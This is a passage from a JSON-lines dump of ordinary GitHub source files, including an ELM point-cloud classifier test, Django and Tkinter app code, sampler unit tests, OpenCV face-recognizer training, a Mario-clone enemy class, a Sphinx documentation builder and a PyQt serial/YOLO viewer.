'sigmoid':\n siglayer = SimpleRandomHiddenLayer(n_hidden=n_hidden, activation_func='sigmoid')\n elif hidden_layer =='grbf':\n siglayer = GRBFRandomLayer(n_hidden=n_hidden, grbf_lambda=1e-3)\n\n if use_label_smooth:\n print(\"use_label_smooth:\")\n clf = ELMClassifierLabelSmooth(siglayer)\n else:\n clf = ELMClassifier(siglayer)\n\n\n x_train = input_mapping(x_train,B)\n\n clf.fit(x_train, y_train)\n end = time.time()\n print(\" Training time\", end - start)\n return clf\n # joblib.dump(clf, './KELM/·' + opt.model + '_KELM_' + str(n_hidden) + '.pkl')\n\n\n\ndef kelm_test(clf ,x_test, y_test,prec1 = 0,B=None):\n print(\" Begin testing\")\n start = time.time()\n # print(x_test.shape)\n top1,top5 = clf.predict(input_mapping(x_test,B))\n\n end = time.time()\n print(\" Testing time\", end - start)\n # isTrue = top1 == y_test\n # # print(pre_result.size)\n # acc = np.sum(isTrue == True) / top1.size * 100\n\n top1acc = top1_acc(top1, y_test)\n top5acc = top5_acc(top5, y_test)\n class_acc = metrics.balanced_accuracy_score(top1, y_test) * 100\n print(' top1 Acc:',top1acc)\n print(' top5 Acc:',top5acc)\n print(' class Acc:', class_acc)\n print(' Promote',top1acc - prec1)\n\ndef top5_acc(top5,target):\n y_test_ = target.reshape(-1, 1)\n top5_is_true = y_test_ == top5\n return np.sum(top5_is_true == True) / target.size * 100\n\ndef top1_acc(top1,target):\n isTrue = top1 == target\n return np.sum(isTrue == True) / target.size * 100\n\n\ndef read_npys(filename):\n dict = np.load(filename,allow_pickle=True).item()\n label = dict['label']\n feature = dict['feature']\n target = dict['target']\n return label,feature,target\n\n#DGCNN 92.22, 99.35\n#PointNet 89.8703,98.7034\ndef get_perc():\n\n return 92.22, 99.35\n\nif __name__ == '__main__':\n seed = 0\n np.random.seed(seed)\n torch.random.manual_seed(seed)\n random.seed(seed)\n # main()\n print(opt.model+'____'+opt.dataset)\n dir = 'npys/'+'DGCNNMN40'\n train_filename = dir+'/train.npy'\n test_filename = dir + '/test.npy'\n\n label_train,feature_train,target_train = read_npys(train_filename)\n label_test, feature_test, target_test = read_npys(test_filename)\n\n prec1,prec5 = get_perc()\n print('Original top1:',prec1)\n print('Original top5:',prec5)\n\n # label elm\n print('label based:')\n # label_clf = 
kelm_train(label_train,target_train,'sigmoid',1000,use_label_smooth=False)\n # kelm_test(label_clf, label_test, target_test, prec1)\n\n # label_clf = kelm_train(label_train, target_train, 'sigmoid', 369, use_label_smooth=False)\n # print('--------------------------------------------')\n # kelm_test(label_clf, label_test, target_test, prec1)\n #\n # Bguass = np.random.normal(loc=0.0,scale=1.0,size=(40,333))\n # label_clf = kelm_train(label_train, target_train, 'rbf', 666, B=Bguass)\n # kelm_test(label_clf, label_test, target_test, prec1,B=Bguass)\n\n # feature elm\n print('feature based:')\n Bguass = np.random.normal(loc=0.0,scale=1.0,size=(2048,2048))\n feature_clf =kelm_train(feature_train,target_train,'rbf',2400,B=Bguass)\n kelm_test(feature_clf,feature_test,target_test,prec1,B=Bguass)\n\n # rbf 2500\n # rbf 2350 -2.71\n # rbf 2400 -2.55\n # rbf 2401 -2.67\n # rbf 2500 -2.71\n # rbf 2600 -2.87\n # rbf 2700 -2.75\n # rbf 2800 -2.75\n # rbf 2900 -2.79\n # rbf 3000 -2.63\n # rbf 3100 -2.71\n","repo_name":"lizhuangzi/PointELM","sub_path":"testComplexKELMDGCNN.py","file_name":"testComplexKELMDGCNN.py","file_ext":"py","file_size_in_byte":4665,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"69"}
+{"seq_id":"21722825152","text":"from django.shortcuts import redirect, render\nfrom django.urls import is_valid_path\nfrom .forms import ArticleCreateForm\n\nfrom .models import Article\n\ndef article_list(request):\n template_name = \"articles/article_list.html\"\n articles = Article.objects.all().order_by(\"-created_at\")\n picked_up_articles = Article.objects.filter(is_picked_up=True).order_by(\"-created_at\")\n\n content = {\n \"articles\": articles,\n \"picked_up_articles\": picked_up_articles,\n }\n return render(request, template_name, content)\n\ndef article_detail(request, pk):\n article = Article.objects.get(pk = pk)\n content = {\n \"article\": article,\n \"twitter_card\": article,\n }\n template_name = \"articles/article_detail.html\"\n return render(request, template_name, content)\n\ndef article_create(request):\n params = {\"title\": \"\", \"thumbnail\": \"\", \"caption\": \"\", \"author\": \"\", \"description\": \"\", \"body\": \"\", \"from\": None}\n\n if request.method == 'POST':\n form = ArticleCreateForm(request.POST)\n\n if form.is_valid():\n form.save()\n else:\n print(\"ret\")\n # return redirect(article_list)\n else:\n params['form'] = ArticleCreateForm()\n\n content = {}\n template_name = \"articles/article_create.html\"\n return render(request, template_name, params)","repo_name":"okmtyuta/archive","sub_path":"MyPages/articles/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1329,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"5003044073","text":"__author__ = 'Harvs'\n\nimport Tkinter as tk\nfrom Tkinter import *\nfrom ttk import *\nimport ttk\nimport tkMessageBox as tm\n\n\ndef popup_add_to_cart(parent):\n class Popup(object):\n\n def __init__(self):\n self.top = Toplevel(parent, takefocus=True)\n self.top.resizable(0, 0)\n self.top.title(\"Add To Cart\")\n self.customer = None\n\n self.frame = ttk.Frame(self.top)\n self.frame.pack(side=tk.TOP, fill=tk.BOTH, expand=True)\n\n self.labelframe1 = ttk.LabelFrame(self.frame)\n self.labelframe1.pack(fill='both', expand='yes', padx=5, pady=5)\n self.customer_name_label = Label(self.labelframe1, text='Name of customer:')\n self.customer_name_label.grid(row=0, column=0, padx=5, pady=5)\n self.customer_name_field = Entry(self.labelframe1)\n self.customer_name_field.focus_set()\n self.customer_name_field.grid(row=0, column=1, padx=5, pady=5)\n\n self.labelframe2 = ttk. LabelFrame(self.frame)\n self.labelframe2.pack(fill='both', expand='yes', padx=5, pady=5)\n self.add_label = ttk.Label(self.labelframe2, text='Add order to cart?')\n self.add_label.pack(side=TOP, padx=5, pady=5)\n self.yes_btn = Button(self.labelframe2, text='Yes', command=self.do)\n self.no_btn = Button(self.labelframe2, text='No', command=self.no)\n self.yes_btn.pack(side=RIGHT, padx=5, pady=5)\n self.no_btn.pack(side=LEFT, padx=5, pady=5)\n self.yes_btn.focus_set()\n self.top.bind(\"\", self.do)\n self.top.grab_set()\n\n def do(self):\n self.customer = self.customer_name_field.get()\n if len(self.customer) > 0:\n self.top.grab_release()\n self.top.destroy()\n else:\n tm.showerror(\"Add to cart error\", \"Invalid Customer Name\", parent=self.top)\n\n def no(self):\n self.top.grab_release()\n self.top.destroy()\n\n pop = Popup()\n parent.wait_window(pop.top)\n\n customer = pop.customer\n del pop\n\n return customer\n\n\ndef popup_cancel_order(parent):\n class Popup(object):\n\n def __init__(self):\n self.top = Toplevel(parent, takefocus=True)\n self.top.resizable(0, 0)\n self.top.title(\"Cancel Order\")\n self.value = None\n\n self.frame = ttk.Frame(self.top)\n self.frame.pack(side=tk.TOP, fill=tk.BOTH, expand=True)\n\n self.labelframe1 = ttk.LabelFrame(self.frame, text='Confirm Action')\n self.labelframe1.pack(fill=\"both\", expand=\"yes\", padx=5, pady=5)\n self.customer_name_label = Label(self.labelframe1, text=\"Cancel Order?\")\n self.customer_name_label.grid(row=0, column=0, padx=3, pady=5)\n\n self.yes_btn = Button(self.frame, text='Yes', command=self.do)\n self.no_btn = Button(self.frame, text='No', command=self.no)\n self.yes_btn.pack(side=RIGHT, padx=5, pady=10)\n self.no_btn.pack(side=RIGHT, padx=5, pady=10)\n self.yes_btn.focus_set()\n self.top.bind(\"\", self.do)\n self.top.grab_set()\n\n def do(self):\n self.value = 1\n self.top.grab_release()\n self.top.destroy()\n\n def no(self):\n self.value = 0\n self.top.grab_release()\n self.top.destroy()\n\n pop = Popup()\n parent.wait_window(pop.top)\n\n value = pop.value\n del pop\n\n return value\n\n\ndef popup_incomplete_details_error(parent):\n tm.showerror(\"Add to cart error\", \"Incomplete Order Details\", parent=parent)\n","repo_name":"hsarbas/yolotea","sub_path":"0.2/yolotea/popups.py","file_name":"popups.py","file_ext":"py","file_size_in_byte":3688,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"70275991900","text":"import pytest\nimport numpy\n\nfrom epsie.proposals import (Normal, Eigenvector, BoundedNormal, Angular)\n\nfrom test_ptsampler import _create_sampler\n\nfrom _utils import Model\n\nSTABILITY_DURATION = 48\nDURATION = 16\n\n\ndef _setup_proposal(proposal_name, jump_interval, params):\n duration = STABILITY_DURATION + DURATION\n if proposal_name == 'normal':\n return Normal(params, jump_interval=jump_interval,\n jump_interval_duration=duration)\n elif proposal_name == 'eigenvector':\n return Eigenvector(params, jump_interval=jump_interval,\n jump_interval_duration=duration)\n elif proposal_name == 'bounded_normal':\n bounds = {'x0': (-20, 20), 'x1': (-40, 40)}\n return BoundedNormal(params, bounds, jump_interval=jump_interval,\n jump_interval_duration=duration)\n elif proposal_name == 'angular':\n return Angular(params, jump_interval=jump_interval,\n jump_interval_duration=duration)\n else:\n return -1\n\n\ndef _extract_positions(chains, kind='current'):\n out = numpy.zeros((len(chains), len(chains[0].chains), 2))\n for i, chain in enumerate(chains):\n for j, subchain in enumerate(chain.chains):\n if kind == 'proposed':\n out[i, j, :] = list(subchain.proposed_position.values())\n else:\n out[i, j, :] = list(subchain.current_position.values())\n return out\n\n\n@pytest.mark.parametrize('nprocs', [1, 4])\n@pytest.mark.parametrize('proposal_name', ['normal', 'eigenvector',\n 'bounded_normal', 'angular'])\n@pytest.mark.parametrize('jump_interval', [1, 2, 5])\ndef test_jump_proposal_interval(nprocs, proposal_name, jump_interval):\n model = Model()\n # let x0 be the slow parameter and x1 the fast one\n proposal = _setup_proposal(proposal_name, jump_interval, params=['x0'])\n sampler = _create_sampler(model, nprocs, proposals=[proposal])\n # Run the sampler for some number of initial iterations\n sampler.run((STABILITY_DURATION + 1) * jump_interval)\n\n for _ in range((DURATION - 1) * jump_interval):\n current_pos = _extract_positions(sampler.chains, 'current')\n sampler.run(1)\n proposed_pos = _extract_positions(sampler.chains, 'proposed')\n\n # check that x0 are different if proposing a move, else the same\n if (sampler.niterations - 1) % jump_interval != 0:\n numpy.testing.assert_equal(current_pos[:, :, 0],\n proposed_pos[:, :, 0])\n else:\n assert numpy.all(current_pos[:, :, 0] != proposed_pos[:, :, 0])\n # check that x1 proposed position is always different\n assert numpy.all(current_pos[:, :, 1] != proposed_pos[:, :, 1])\n\n # Now that the burnin phase is over check both x0 and x1 are proposed at\n # each turn\n for i in range(DURATION):\n current_pos = _extract_positions(sampler.chains, 'current')\n sampler.run(1)\n proposed_pos = _extract_positions(sampler.chains, 'proposed')\n\n assert numpy.all(current_pos != proposed_pos)\n","repo_name":"cdcapano/epsie","sub_path":"test/test_jump_interval.py","file_name":"test_jump_interval.py","file_ext":"py","file_size_in_byte":3140,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"69"}
+{"seq_id":"28657870985","text":"# 왼, 오 창문을 열었을 때 양쪽 모두 2 이상! 의 공간\n# 맨 왼쪽 두칸과 오른쪾 두칸은 건물이 없다\n# 최대 높이는 255\n\ndef sunlight():\n ans = 0\n for i in range(2, n-2):\n h = a[i]\n other = max(a[i-2],a[i-1],a[i+1],a[i+2])\n ans += h-other if h>other else 0\n return ans\n\n\nfor t in range(10):\n n = int(input())\n a = list(map(int, input().split()))\n print(f'#{t+1}', sunlight())\n","repo_name":"hjle2/Algorithm","sub_path":"SWEA/1206. [SW 문제해결 기본] 1일차 - View.py","file_name":"1206. [SW 문제해결 기본] 1일차 - View.py","file_ext":"py","file_size_in_byte":448,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"4380341296","text":"import cv2\nimport numpy as np\nimport os, glob\n\n# 변수 설정 --- ①\nbase_dir = './faces'\ntrain_data, train_labels = [], []\n\n\ndirs = [d for d in glob.glob(base_dir+\"/*\") if os.path.isdir(d)]\nprint('Collecting train data set:')\nfor dir in dirs:\n # name_id 형식에서 id를 분리 ---②\n id = dir.split('_')[1] \n files = glob.glob(dir+'/*.jpg')\n print('\\t path:%s, %dfiles'%(dir, len(files)))\n for file in files:\n img = cv2.imread(file, cv2.IMREAD_GRAYSCALE)\n # 이미지는 train_data, 아이디는 train_lables에 저장 ---③\n train_data.append(np.asarray(img, dtype=np.uint8))\n train_labels.append(int(id))\n\n# NumPy 배열로 변환 ---④\ntrain_data = np.asarray(train_data)\ntrain_labels = np.int32(train_labels)\n\n# LBP 얼굴인식기 생성 및 훈련 ---⑤\nprint('Starting LBP Model training...')\nmodel = cv2.face.LBPHFaceRecognizer_create()\nmodel.train(train_data, train_labels)\nmodel.write('./faces/all_face.xml')\nprint(\"Model trained successfully!\")\n","repo_name":"dltpdn/insightbook.opencv_project_python","sub_path":"09.ml/lbp_face2_train.py","file_name":"lbp_face2_train.py","file_ext":"py","file_size_in_byte":1018,"program_lang":"python","lang":"en","doc_type":"code","stars":54,"dataset":"github-code","pt":"69"}
+{"seq_id":"24424338230","text":"from classes.Animation import Animation\nfrom classes.Collider import Collider\nfrom classes.EntityCollider import EntityCollider\nfrom entities.EntityBase import EntityBase\nfrom traits.leftrightwalk import LeftRightWalkTrait\nfrom entities.Particles import KnockedOff,Points\nfrom classes.Spritesheet import MobSheet\n\nsprites = MobSheet()\n\nclass Goomba(EntityBase):\n def __init__(self, screen, x, y, variant, level, sound):\n super(Goomba, self).__init__(x,y,1.25)\n self.screen = screen\n images = [sprites.get(\"goomba1\",variant),sprites.get(\"goomba2\",variant)]\n self.animation = Animation(images)\n self.squishedImage = sprites.get(\"goombaD\",variant)\n self.leftrightTrait = LeftRightWalkTrait(self, level, direction=-1)\n self.type = \"Mob\"\n self.collision = Collider(self, level)\n self.EntityCollider = EntityCollider(self)\n self.levelObj = level\n self.stomped = False\n self.sound = sound\n self.checkZone()\n\n def update(self, shift):\n if self.stomped:\n self.stomp(shift)\n elif self.knockedoff:\n self.knockoff()\n elif self.alive:\n self.applyGravity()\n self.drawGoomba(shift)\n self.leftrightTrait.update()\n self.checkEntityCollision()\n\n def drawGoomba(self, shift):\n self.screen.blit(self.animation.image, ((self.getPosIndexAsFloat().x+shift)*32, self.rect.y))\n self.animation.update()\n\n def stomp(self, shift):\n if self.timer == 0:\n points = Points(self.levelObj.dashboard,self.rect.x,self.rect.y,100)\n self.levelObj.entities.add(points)\n if self.timer < self.timeAfterDeath:\n self.screen.blit(self.squishedImage,((self.getPosIndexAsFloat().x+shift)*32, self.rect.y))\n else:\n self.alive = False\n self.timer += 0.1\n \n def knockoff(self):\n self.image = self.animation.image\n self.alive = False\n self.levelObj.dashboard.points += 100\n entity = KnockedOff(self.screen,self,self.sound)\n self.levelObj.entities.add(entity)\n \n def checkEntityCollision(self):\n for ent in self.levelObj.entities:\n collisionState = self.EntityCollider.check(ent)\n if self.rect.colliderect(ent.rect):\n if ent.type == \"Mob\" or ent.type == \"Object\":\n ent.collide(self, collisionState)\n\n def collide(self,player,collisionState):\n if not(self.stomped or self.knockedoff):\n if player.type == \"Player\":\n if collisionState.isTop:\n self.sound.play_sfx(\"stomp\")\n player.rect.bottom = self.rect.top\n player.bounce()\n self.stomped = True\n self.levelObj.dashboard.points += 100\n elif player.star:\n self.knockedoff = True\n self.levelObj.dashboard.points += 400\n points = Points(self.levelObj.dashboard,self.rect.x,self.rect.y,500)\n self.levelObj.entities.add(points)\n else:\n player.damage()","repo_name":"averyl56/mario-bros-remake","sub_path":"entities/Goomba.py","file_name":"Goomba.py","file_ext":"py","file_size_in_byte":3184,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"15186157382","text":"import getRootPath\nimport json\n\n\ndef writerjson(path, data):\n \"\"\"\n 将dict写入文本,w+ 直接把原来的文本覆盖\n :return:\n \"\"\"\n with open(getRootPath.getRootPath() + path, \"w+\", encoding=\"utf8\") as f:\n json.dump(data, f)\n\n\ndef readjson(path):\n \"\"\"\n 读json\n :return:\n \"\"\"\n with open(getRootPath.getRootPath() + path, \"r\", encoding=\"utf8\") as f:\n allproduct_list = json.loads(f.read())\n return allproduct_list\n\n\ndef getAccount(name):\n \"\"\"\n 获取账号信息\n :param name:\n :return:\n \"\"\"\n accountdict = readjson(\"/config/account.conf\")\n account = accountdict[name]\n return [account[\"account\"], account[\"password\"]]\n\n\ndef jsonToDict(pathstr):\n \"\"\"\n json转换dict\n :param pathstr:\n :return:\n \"\"\"\n rootPath = getRootPath.getRootPath()\n confpath = rootPath + pathstr\n\n with open(confpath, 'r', encoding=\"utf8\") as confFile:\n confStr = confFile.read()\n\n conf = json.JSONDecoder().decode(confStr)\n return conf","repo_name":"mysticbinary/EasierSpider","sub_path":"tools/json_tool.py","file_name":"json_tool.py","file_ext":"py","file_size_in_byte":1022,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"69"}
+{"seq_id":"16187146726","text":"import time\nfrom socket import timeout\nfrom struct import unpack\n\nimport numpy as np\nfrom PyQt5 import QtWidgets\nfrom PyQt5.QtWidgets import QMainWindow,QDialog, QApplication, QWidget, QTableWidgetItem, QGridLayout\nfrom PyQt5.uic import loadUi\nfrom PyQt5.QtGui import *\nimport cv2\nimport serial, sys\nfrom PyQt5.QtCore import *\n\nser = serial.Serial('COM8', 9600, timeout=1)\n\ndata_1 = []\ndata_2 = []\ndata_3 = []\ndata_4 = []\n\n\nclass Worker(QThread):\n ImageUpdate = pyqtSignal(QImage)\n\n modelConfiguration = 'yolov4-tiny_kastem.cfg'\n modelWeights = 'yolov4-tiny_kastem_last.weights'\n net = cv2.dnn.readNetFromDarknet(modelConfiguration, modelWeights)\n net.setPreferableBackend(cv2.dnn.DNN_BACKEND_OPENCV)\n net.setPreferableTarget(cv2.dnn.DNN_TARGET_CPU)\n\n classesFile = 'classes.names'\n classNames = []\n with open(classesFile, 'rt') as f:\n classNames = f.read().rstrip('\\n').split('\\n')\n\n whT = 320\n\n def run(self):\n Capture = cv2.VideoCapture(0)\n self.ThreadActive = True\n while self.ThreadActive:\n ret, frame = Capture.read()\n if ret:\n blob = cv2.dnn.blobFromImage(frame, 1 / 255, (self.whT, self.whT), [0, 0, 0], 1, crop=False)\n self.net.setInput(blob)\n layerNames = self.net.getLayerNames()\n outputNames = [layerNames[i - 1] for i in self.net.getUnconnectedOutLayers()]\n outputs = self.net.forward(outputNames)\n self.findobject(outputs, frame)\n\n Image = cv2.cvtColor(frame, cv2.COLOR_BGR2RGB)\n FlippedImage = cv2.flip(Image, 1)\n\n Convert2QtFormat = QImage(FlippedImage.data, FlippedImage.shape[1], FlippedImage.shape[0], QImage.Format_RGB888)\n Pic = Convert2QtFormat.scaled(281, 221, Qt.KeepAspectRatio)\n self.ImageUpdate.emit(Pic)\n\n def stop(self):\n self.ThreadActive = False\n self.quit()\n\n def findobject(self,outputs,img):\n confThreshold = 0.3\n nmsThreshold = 0.3\n hT, wT, cT = img.shape\n bbox = []\n classIds = []\n confs = []\n\n for output in outputs:\n for det in output:\n scores = det[5:]\n classId = np.argmax(scores)\n confidence = scores[classId]\n if confidence > confThreshold:\n w, h = int(det[2]*wT), int(det[3]*hT)\n x, y = int((det[0]*wT)-w/2), int((det[1]*hT)-h/2)\n bbox.append([x,y,w,h])\n classIds.append(classId)\n confs.append(float(confidence))\n indices = cv2.dnn.NMSBoxes(bbox, confs, confThreshold, nmsThreshold)\n print(indices)\n for i in indices:\n box = bbox[i]\n x,y,w,h = box[0], box[1], box[2], box[3]\n cv2.rectangle(img, (x, y), (x + w, y + h), (255, 0, 255), 2)\n # cv2.putText(img, f'{self.classNames[classIds[i]].upper()}{int(confs[i] * 100)}%',\n # (x, y - 10), cv2.FONT_HERSHEY_SIMPLEX, 0.6, (255, 0, 255), 2)\n\n\n\n\nclass SerialThread(QThread):\n d1 = pyqtSignal(float)\n d2 = pyqtSignal(float)\n d3 = pyqtSignal(float)\n d4 = pyqtSignal(float)\n\n def run(self):\n #global d1, d2, d3, d4\n\n while True:\n dataRaw = ser.read()\n if (dataRaw == b'@'):\n dataRaw = ser.read(16)\n\n self.d1 = unpack('f', dataRaw[0:4])[0]\n self.d2 = unpack('f', dataRaw[4:8])[0]\n self.d3 = unpack('f', dataRaw[8:12])[0]\n self.d4 = unpack('f', dataRaw[12:16])[0]\n\n data_1.append('{:.2f}'.format(self.d1))\n data_2.append('{:.2f}'.format(self.d2))\n data_3.append('{:.2f}'.format(self.d3))\n data_4.append('{:.2f}'.format(self.d4))\n\n\nclass GraphScreen(QMainWindow):\n def __init__(self):\n super(GraphScreen, self).__init__()\n loadUi(\"UI.ui\", self)\n\n self.pushButton_2.clicked.connect(self.display)\n self.cameraButton.clicked.connect(self.camDisplay)\n\n def camDisplay(self):\n self.cam = Worker()\n 
self.cam.start()\n self.cam.ImageUpdate.connect(self.imageUpdateSlot)\n self.cameraButton.setEnabled(False)\n\n def imageUpdateSlot(self, Image):\n self.label_7.setPixmap(QPixmap.fromImage(Image))\n\n def display(self):\n self.textBrowser.setText(\"0\")\n self.textBrowser_2.setText(\"0\")\n self.textBrowser_3.setText(\"0\")\n self.textBrowser_4.setText(\"0\")\n\n self.serth = SerialThread()\n self.serth.start()\n\n self.qTimer = QTimer()\n self.qTimer.setInterval(100)\n self.qTimer.timeout.connect(self.check)\n self.qTimer.start()\n self.pushButton_2.setEnabled(False)\n\n def check(self):\n self.textBrowser.setText(\"{:.2f}\".format(self.serth.d1))\n self.textBrowser_2.setText(\"{:.2f}\".format(self.serth.d2))\n self.textBrowser_3.setText(\"{:.2f}\".format(self.serth.d3))\n self.textBrowser_4.setText(\"{:.2f}\".format(self.serth.d4))\n\n\n #time.sleep(2)\n\n\napp = QApplication(sys.argv)\ngraph = GraphScreen()\nwidget = QtWidgets.QStackedWidget()\nwidget.addWidget(graph)\nwidget.setFixedHeight(326)\nwidget.setFixedWidth(696)\nwidget.show()\ntry:\n sys.exit(app.exec_())\nexcept:\n print(\"exiting\")","repo_name":"tfqqrman/chickenProject","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":5367,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"31745049555","text":"\"\"\"\nGiven an array arr[] of positive integers of size N. Reverse every sub-array group of size K.\n\"\"\"\nk = 3\narr = [1, 2, 3, 4, 5]\ni = 0\nwhile i < len(arr):\n m = i\n n = min(i+k-1, len(arr)-1)\n while m < n:\n arr[m], arr[n] = arr[n], arr[m]\n m += 1\n n -= 1\n i += k\n\nprint(arr)\n","repo_name":"shreyans-tiwari/Geeks4Geeks","sub_path":"Array/reverse_array_in_groups.py","file_name":"reverse_array_in_groups.py","file_ext":"py","file_size_in_byte":307,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"19250784972","text":"\"\"\"\r\n--------------------------------------------------------------------------\r\nCopyright (C) 2017-2020 Lukasz Laba \r\n\r\nThis file is part of Tebe.\r\n\r\nTebe is free software; you can redistribute it and/or modify\r\nit under the terms of the GNU General Public License as published by\r\nthe Free Software Foundation; either version 2 of the License, or\r\n(at your option) any later version.\r\n\r\nTebe is distributed in the hope that it will be useful,\r\nbut WITHOUT ANY WARRANTY; without even the implied warranty of\r\nMERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\r\nGNU General Public License for more details.\r\n\r\nYou should have received a copy of the GNU General Public License\r\nalong with Tebe; if not, write to the Free Software\r\nFoundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA\r\n--------------------------------------------------------------------------\r\n\"\"\"\r\n\r\nimport sys\r\nimport platform\r\nimport os\r\nimport tempfile\r\nimport subprocess\r\nimport shutil\r\n\r\nimport src.pycore.app_utils as app_utils\r\n\r\nPYTHON_BIN_PATH = os.path.dirname(sys.executable)\r\nif platform.system() == 'Windows':\r\n sphinxbuild_path = os.path.join(PYTHON_BIN_PATH, 'Scripts', 'sphinx-build')\r\nelse:\r\n sphinxbuild_path = os.path.join(PYTHON_BIN_PATH, 'sphinx-build')\r\n\r\n\r\nclass SphinxBuilder:\r\n def __init__(self):\r\n\r\n self.tmp_html_dir = self.__get_tempdir('tebeHTML')\r\n self.tmp_pdf_dir = self.__get_tempdir('tebePDF')\r\n # ---\r\n self.Content = None\r\n # ---\r\n self.theme = None\r\n self.theme_template_dir = app_utils.abspath('pycore/sphinx_conf_template')\r\n # ---\r\n self.confdir = None\r\n # ----\r\n self.where_pdf_saved = None\r\n # ----\r\n self.__html_is_builded_for = None\r\n # ---\r\n self.set_theme()\r\n\r\n @staticmethod\r\n def __get_tempdir(prefix_string):\r\n\r\n dirpath = tempfile.mkdtemp()\r\n dirname = os.path.basename(dirpath)\r\n new_dirname = prefix_string + '_' + dirname\r\n new_dirpath = dirpath.replace(dirname, new_dirname)\r\n os.rename(dirpath, new_dirpath)\r\n return new_dirpath\r\n\r\n # -----------------------------------------------------\r\n def assign_content_object(self, content_object):\r\n self.Content = content_object\r\n\r\n def get_available_themes(self):\r\n theme_list = []\r\n for name in os.listdir(self.theme_template_dir):\r\n if '.' 
not in name:\r\n theme_list.append(name)\r\n theme_list.sort()\r\n return theme_list\r\n\r\n def set_theme(self, theme='basic_like_paper'):\r\n # ---\r\n self.confdir = self.theme_template_dir\r\n self.confdir = os.path.join(self.confdir, theme)\r\n # ---\r\n self.theme = theme\r\n\r\n # -----------------------------------------------------\r\n\r\n @property\r\n def source_dir_path(self):\r\n if self.Content:\r\n return self.Content.source_dir_path\r\n else:\r\n return None\r\n\r\n def build_html(self):\r\n if self.source_dir_path:\r\n # ---\r\n scrdir = self.source_dir_path\r\n outdir = self.tmp_html_dir\r\n # ---\r\n if self.Content.conf_file_path:\r\n proc = subprocess.Popen([sphinxbuild_path,\r\n '-b', 'html',\r\n scrdir, outdir])\r\n else:\r\n if self.theme == 'sphinx_rtd_theme':\r\n proc = subprocess.Popen(['cp', self.confdir+\"/conf.py\", scrdir])\r\n proc.wait()\r\n proc=subprocess.Popen([sphinxbuild_path,\r\n '-b', 'html',\r\n scrdir, outdir])\r\n else:\r\n proc = subprocess.Popen([sphinxbuild_path,\r\n '-b', 'html',\r\n '-c', self.confdir,\r\n scrdir, outdir])\r\n proc.wait()\r\n # ---\r\n self.__html_is_builded_for = self.source_dir_path\r\n print('build_html done')\r\n\r\n def build_pdf(self, dst_file=None):\r\n self.where_pdf_saved = None\r\n # ---\r\n for fname in os.listdir(self.tmp_pdf_dir):\r\n if '.pdf' in fname:\r\n file_pth = os.path.join(self.tmp_pdf_dir, fname)\r\n os.remove(file_pth)\r\n # ---\r\n if self.source_dir_path:\r\n # ---\r\n scrdir = self.source_dir_path\r\n print(scrdir)\r\n outdir = self.tmp_pdf_dir\r\n # ---\r\n if self.Content.conf_file_path:\r\n proc = subprocess.Popen([sphinxbuild_path,\r\n '-b', 'pdf',\r\n scrdir, outdir])\r\n else:\r\n proc = subprocess.Popen([sphinxbuild_path,\r\n '-b', 'pdf',\r\n '-c', self.confdir,\r\n scrdir, outdir])\r\n proc.wait()\r\n # ---\r\n for fname in os.listdir(self.tmp_pdf_dir):\r\n if '.pdf' in fname:\r\n scr_file = os.path.join(self.tmp_pdf_dir, fname)\r\n if not dst_file:\r\n dst_file = os.path.join(self.source_dir_path, fname)\r\n shutil.copyfile(scr_file, dst_file)\r\n # ---\r\n self.where_pdf_saved = dst_file\r\n print('build_pdf done')\r\n\r\n # -----------------------------------------------------\r\n def is_html_builded(self):\r\n if self.source_dir_path:\r\n if self.source_dir_path == self.__html_is_builded_for:\r\n return True\r\n else:\r\n return False\r\n else:\r\n return False\r\n\r\n def html_path_for(self, markup_file):\r\n html_file_name = markup_file\r\n html_file_name = html_file_name.replace('.rst', '.html')\r\n html_file_name = html_file_name.replace('.md', '.html')\r\n html_file_path = os.path.join(self.tmp_html_dir, html_file_name)\r\n return html_file_path\r\n\r\n # -----------------------------------------------------\r\n def delete_tmpdirs(self):\r\n shutil.rmtree(self.tmp_html_dir)\r\n shutil.rmtree(self.tmp_pdf_dir)\r\n\r\n def close(self):\r\n self.delete_tmpdirs()\r\n self.tmp_html_dir = None\r\n self.tmp_pdf_dir = None\r\n\r\n def __del__(self):\r\n if self.tmp_html_dir:\r\n self.close()\r\n","repo_name":"jrdcasa/sphinx-gui3","sub_path":"src/pycore/SphinxBuilder.py","file_name":"SphinxBuilder.py","file_ext":"py","file_size_in_byte":6677,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"69"}
+{"seq_id":"12956174275","text":"\"\"\"Runner module for demoapp\"\"\"\n\nimport argparse\nimport sys\n\nimport demoapp\n\n\ndef parse_args(args):\n \"\"\"Parse command line parameters\n\n Args:\n args: command line parameters as list of strings\n\n Returns:\n :obj:`argparse.Namespace`: command line parameters\n \"\"\"\n parser = argparse.ArgumentParser(\n description=\"A demo application for PyScaffold's unit testing\"\n )\n version = demoapp.__version__\n parser.add_argument(\n \"-v\", \"--version\", action=\"version\", version=f\"demoapp {version}\"\n )\n opts = parser.parse_args(args)\n return opts\n\n\ndef main(args):\n parse_args(args)\n print(\"Hello World\")\n\n\ndef run():\n \"\"\"\n Entry point for setup.py\n \"\"\"\n main(sys.argv[1:])\n\n\nif __name__ == \"__main__\":\n main(sys.argv[1:])\n","repo_name":"pyscaffold/pyscaffold","sub_path":"tests/demoapp/runner.py","file_name":"runner.py","file_ext":"py","file_size_in_byte":788,"program_lang":"python","lang":"en","doc_type":"code","stars":1901,"dataset":"github-code","pt":"69"}
